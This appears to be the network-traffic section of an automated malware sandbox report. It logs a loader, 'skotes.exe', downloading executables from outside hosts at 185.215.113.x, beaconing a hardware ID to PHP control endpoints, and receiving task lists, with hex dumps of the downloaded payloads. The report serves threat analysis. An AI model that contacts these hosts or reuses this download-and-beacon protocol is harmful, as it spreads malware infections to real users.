                                                                                                                                                                                                                                                              Data Raw: 31 36 66 0d 0a 20 3c 63 3e 31 30 31 33 35 33 36 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 33 35 33 37 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 33 35 33 38 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 66 37 62 38 63 37 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 33 35 33 39 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 16f <c>1013536001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1013537001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1013538001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1013539001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              2192.168.2.449770185.215.113.16807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:08.866079092 CET55OUTGET /luma/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.209919930 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:09 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 1895424
                                                                                                                                                                                                                                                              Last-Modified: Mon, 09 Dec 2024 21:09:04 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "67575c70-1cec00"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4b 00 00 04 00 00 a6 e5 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELUgJ@K@\@p0A B@.rsrc0R@.idata @V@ +PX@xyjapqshp`0lZ@fjnsenoeJ@.taggant0J"@
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.209989071 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.209999084 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210146904 CET372INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210207939 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210220098 CET1236INData Raw: a7 2f 77 4f c9 eb 53 b8 29 16 79 ef 8e 42 b9 17 93 e1 8c 3c 44 76 ad 80 2c a5 b3 d7 61 eb 0f 19 7a 26 4f cb 18 e2 9c 5d 8e 36 a1 f1 71 09 9d 1d 64 e3 e5 dd 37 a2 6f e1 a2 ce 7f 56 36 eb e1 8d 28 da ca f9 96 db e3 6e 2f 08 6a d8 9a 12 58 de cd a0
                                                                                                                                                                                                                                                              Data Ascii: /wOS)yB<Dv,az&O]6qd7oV6(n/jXs)KM!^S,QWRNs4)Q:d:N,lN^y2B@<c4NWA4v:lK*SOD{JKc@#~U2%W`W>^+"
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210230112 CET1236INData Raw: c1 27 84 19 ce d3 e9 e7 7f 73 96 46 06 c4 7b 3c 0e 3c 42 e1 45 c7 3a 3e 29 da 3a cd bb 96 1b 62 44 bc 61 14 04 b0 3a d9 82 de 95 1c 4a 79 a8 88 c7 ab 44 ef 1a 29 7b ed c7 46 8f 50 36 82 78 16 99 28 80 eb a9 28 89 f9 bf c4 c4 a5 b3 d5 49 4e bf f3
                                                                                                                                                                                                                                                              Data Ascii: 'sF{<<BE:>):bDa:JyD){FP6x((IN7}^JqN3j)s/$X)[n'lOqhsZ\-Sr'yNw~oB3MMTl*BWPvQ;){76Bvd 3wkTO
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210243940 CET1236INData Raw: 42 5f 1f 8f 8f c1 07 5a a9 a4 ca 1e 4a 6c cc f5 31 94 50 21 31 c6 9e 52 c0 6f 03 f9 27 c6 c1 57 3a 55 9c c6 85 c3 5f 73 79 34 7d cd f7 4d f9 3b 9c 27 38 c5 8a 80 b7 d3 48 07 12 7e e6 7f 47 99 67 5f 3b 30 b8 17 b0 08 51 61 59 fa 68 41 81 ce 00 5f
                                                                                                                                                                                                                                                              Data Ascii: B_ZJl1P!1Ro'W:U_sy4}M;'8H~Gg_;0QaYhA_%?C^1.fW^ _.Rhiee.,ZBd8/@K!#}`[:>Q`I\F7?bQSUCU]nV6+\n^5yzX@9as_X%C#QaFF*
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210591078 CET1236INData Raw: 5c c3 0a 60 07 ae 8f 1c 85 27 ac 4a 11 3c 40 e2 c0 9d 53 00 b0 44 ca c6 7d 4f 70 06 17 e7 de 8e cb ca 7f 1a 64 a4 94 9f 09 b2 8d 79 68 e9 61 8e 23 b5 bd 91 2f ac 60 89 ae 1f d3 b4 5d 5f 1c d8 6e e6 3e 2a 4e 4a ca 61 87 16 99 17 92 ec dc 8d 63 65
                                                                                                                                                                                                                                                              Data Ascii: \`'J<@SD}Opdyha#/`]_n>*NJace9c+8~wZavxy$a(CzC;g,CJ _OtTi(a%V|GNXuJ*VZ^VmjVtP
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210601091 CET1236INData Raw: 88 4c b9 cf 8b d6 22 b9 06 79 6c 55 37 79 2a d6 17 50 f2 d2 0d 50 57 f6 83 c6 46 8f 49 f6 bc 00 b2 a8 73 31 c3 37 48 65 7b 9b 04 3b c9 9e ad 11 c7 77 23 ae 49 e4 a9 15 57 8e 5a 10 35 9e 6f 50 39 a6 c2 18 c9 0c b0 fd 83 22 22 43 af 47 08 d2 16 e6
                                                                                                                                                                                                                                                              Data Ascii: L"ylU7y*PPWFIs17He{;w#IWZ5oP9""CG?zzj?B6&XbM&$HK,Dm7sSEhMHwEoe=xDqpX:mRbx,,3w|"Pq/FD(?#,pK][\W[n@7
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.329412937 CET744INData Raw: 30 a1 88 e3 3e 8b d1 ca ae 47 64 40 30 5b ef 5b 29 d1 5d da 45 42 6d 22 f9 a0 72 b5 1b db cd 1f 09 0f 3b d4 b1 bd d8 01 25 4f f8 7f 3f 5f 7b 9f 41 b6 af c4 0a db d5 fa c6 dc 1b d1 f2 35 50 51 c1 8a a4 9d 63 16 b8 0d 76 7d 54 e2 25 09 81 46 66 65
                                                                                                                                                                                                                                                              Data Ascii: 0>Gd@0[[)]EBm"r;%O?_{A5PQcv}T%FfeWcN$<C8'p9_z|`V~~PBJC[&cW"&^ORh;cwb"&dZp7Q?PQ,3kI^M|W.}y`W<o^Rw


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              3192.168.2.449787185.215.113.4380
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:15.862375975 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 33 35 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1013536001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:17.213035107 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:16 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              4192.168.2.449791185.215.113.16807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:17.335149050 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.677970886 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:18 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 1799168
                                                                                                                                                                                                                                                              Last-Modified: Mon, 09 Dec 2024 21:09:11 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "67575c77-1b7400"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 40 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 69 00 00 04 00 00 8b d7 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg(@i@pi@M$a$$ $h@.rsrc$x@.idata $z@ *$|@ipnqzgkg`O~@equqovlh0iN@.taggant0@i"R@
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678046942 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678059101 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678226948 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678245068 CET1236INData Raw: 43 f0 e7 b2 81 28 1c 14 40 35 43 8d 53 6d a0 74 fd 49 64 6e 81 65 ad 3e 29 6d fc 5f 1d e9 f4 63 11 ab cc 0c 01 a3 c4 74 5e 07 d9 f0 60 93 a6 02 79 8d d4 0e 75 1d a4 42 4d 6d b8 25 ea 42 8c d5 3d 71 80 26 34 ef f4 0e 42 55 a8 a6 25 4d 64 0d 07 92
                                                                                                                                                                                                                                                              Data Ascii: C(@5CSmtIdne>)m_ct^`yuBMm%B=q&4BU%MdUvSD>F]p6%"0CCGr]d/)_u((WE %Q"EUw<!VdR4mmu)/fBn7^l}|f6`4=)myn=jBK
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678255081 CET1236INData Raw: 17 85 a6 ca 1c 9d f8 15 3c 72 e9 a1 a9 26 5f bc 70 45 20 c4 13 8d 91 3d ca 8c 81 9a 0c 7d 35 dc b6 0b 6b cf 05 0c 45 7d 66 00 9c 8c d9 04 64 72 2e c0 6b e3 e4 24 01 7d 0a c8 6e 34 72 73 d6 bb c5 3a a7 ee 85 1c 6b 5f 6d e2 a6 83 4d 0d 64 b1 8c 6c
                                                                                                                                                                                                                                                              Data Ascii: <r&_pE =}5kE}fdr.k$}n4rs:k_mMdlX~lAf5 W?.`IzM3vSnydaI*(l;w5s=lHk'N<Dy@+ y?5YRsN`}9hh5Ta>io"/@so
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678266048 CET1236INData Raw: 43 38 cc b2 17 e5 83 e6 85 7b 6e 05 0c 4a 23 33 17 c9 93 8e 3c 1a 74 08 53 2b 34 04 c1 6d 80 96 55 8b 9f 90 c4 35 2c 0f d9 e9 82 0e 89 2e 28 4c 0f 97 ee 0d 05 45 10 61 6c 79 31 08 e3 a9 94 16 4b 4d 96 02 b9 1a 84 89 17 b3 d4 6e 17 75 ac b2 29 f2
                                                                                                                                                                                                                                                              Data Ascii: C8{nJ#3<tS+4mU5,.(LEaly1KMnu)EF|tlF=C+s&~qyXuld.K}dryI1+>!a=Iz(toZyf%o(dTKZy#5l+,=
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678580999 CET1236INData Raw: 05 20 96 69 a3 51 44 b9 84 cc 64 0a a2 ec 48 7b 4d 7f 6c 52 85 fa a9 31 04 15 64 00 7d 2e dc 3e 6f e0 03 be 0d 7a bc 0d a1 e9 a2 02 24 0b f3 02 b5 7f 83 fa 05 7d e9 86 49 f9 cb 1e dd 7f a2 2a 13 d5 ef 1d 37 00 64 0e 28 c6 84 54 4d 39 f3 16 a1 2b
                                                                                                                                                                                                                                                              Data Ascii: iQDdH{MlR1d}.>oz$}I*7d(TM9+n1F=+jEnku<+p3u-)YB#y1@mXqaukf=W=WthxYM9y8p9M5V+?u}+!M<K{)4*X%
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678600073 CET1236INData Raw: e1 72 23 87 13 3e 93 02 41 d7 60 00 0d 21 a0 9a 85 2d bd 7c d6 6d 84 6a 91 59 96 15 a1 7e 8b bf 8b 25 96 06 4d e9 54 b8 45 78 ab 31 71 05 9f 00 9c 6d 98 bc 8b 66 69 bf c4 ee cd a6 0b 42 f4 4b 9d 42 a7 d2 13 c6 fc b1 17 ed a4 67 89 f9 2e 0f 85 f5
                                                                                                                                                                                                                                                              Data Ascii: r#>A`!-|mjY~%MTEx1qmfiBKBg.#Ks]MKLC&&K +2!b)+Am<,%-tYMCZUM%4TgXF3n']'ZK@uYh<-4d
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678610086 CET1236INData Raw: 71 7f 6c b2 81 61 e8 71 07 6b 05 b7 25 f9 9b 74 99 7a f8 bc 13 96 63 64 0f c9 e0 00 ad 4b 74 b3 2e bc 63 8d c9 a1 a3 05 5d f6 60 b0 36 7e 96 de bc 6a b2 76 d1 e9 88 ca 23 39 e7 74 aa 4b 96 d2 0c 91 64 de 9c 2b 17 3d 12 f5 09 b5 17 6d af be 21 f6
                                                                                                                                                                                                                                                              Data Ascii: qlaqk%tzcdKt.c]`6~jv#9tKd+=m!K<9.r'>rI+2QJBxwsZI\-%B%)+nNxat`ZJTR+x=LCOU+p=+}Jb<)%AIDU
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.797410965 CET1236INData Raw: 1d 73 c6 cf ef 02 99 4e 19 bb ee 43 4b 3d e4 79 4c d9 a8 08 29 3f 55 27 8a 57 9d f2 90 5f 82 42 08 44 90 40 88 97 83 07 40 1f b3 68 ef bf ad d8 0c 9a 9c fc 55 47 c0 c6 4d ff 83 12 10 ee 98 be 39 89 30 43 8f 2a 24 e9 05 cc 57 71 b1 53 c0 8e f1 72
                                                                                                                                                                                                                                                              Data Ascii: sNCK=yL)?U'W_BD@@hUGM90C*$WqSr>`lDH@<uL=aU9x:Zl@fEu*TAi &K$C.>hMNZAc:;,:po:$iQKPeVQA*"E@


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              5192.168.2.449807185.215.113.206807148C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.805737972 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.145804882 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:24 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.149343967 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----HDAFBGIJKEGIECAAFHDH
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Content-Length: 211
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 37 41 33 30 41 32 43 37 41 35 31 39 31 35 33 33 34 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: ------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="hwid"9D7A30A2C7A51915334237------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="build"stok------HDAFBGIJKEGIECAAFHDH--
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.594129086 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:25 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                              Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              6192.168.2.449813185.215.113.43807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.134639978 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 33 35 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1013537001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.467751980 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:25 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              7192.168.2.449815185.215.113.16807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.590446949 CET55OUTGET /well/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.921914101 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:26 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 971776
                                                                                                                                                                                                                                                              Last-Modified: Mon, 09 Dec 2024 21:07:21 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "67575c09-ed400"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 01 5c 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 24 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL\Wg"$w@0<@@@d|@hu4@.text `.rdata@@.datalpH@.rsrch@j@@.relocuv^@B
